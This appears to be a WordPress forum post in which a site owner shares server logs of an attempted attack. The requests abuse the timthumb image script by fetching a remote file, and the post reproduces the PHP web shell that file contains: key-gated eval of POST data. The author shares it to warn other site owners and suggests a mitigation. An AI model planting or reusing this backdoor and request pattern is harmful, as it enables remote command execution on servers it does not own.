New Hack Attempt on Self Hosted WordPress Site!!

  • Resolved pinchii

    (@pinchii)


    13 years, 3 months ago

    Got this in my “hack prevention” scripts that I have running on the site

    Remote Address:91.224.160.182
    Remote Port:47762
    Request Method:GET
    Referer:
    Query String:
    Request URI:/home/wp-content/themes/mystique/thumb.php?src=https://blogger.com.bloggera.net/images.php
    User Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62

    And also

    Remote Address:91.224.160.182
    Remote Port:47764
    Request Method:GET
    Referer:
    Query String:
    Request URI:/home/wp-content/themes/mystique/timthumb.php?src=https://blogger.com.bloggera.net/images.php
    User Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62

    The content of the File “images.php” is

    ::::BINARY CODE PAYLOAD::::
    <?php
    if(md5($_POST[“key”]) == “f732d47960be7e806861987f98a9574c”){
    $cmd = $_POST[“code”];
    eval (stripslashes($cmd));
    }
    ?>

    Looks like they are trying to gain CMD on my Apache server

    If you guys are getting the same, I suggest you block PHP files in your wp-content folder

    I posted the same thing on my blog along with what the image that ::::binary code payload:::: actually looks like, look towards the bottom
    https://pinchii.com/home/2011/08/hack-attempt-on-pinchii-com/

Viewing 4 replies - 1 through 4 (of 4 total)
Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘New Hack Attempt on Self Hosted WordPress Site!!’ is closed to new replies.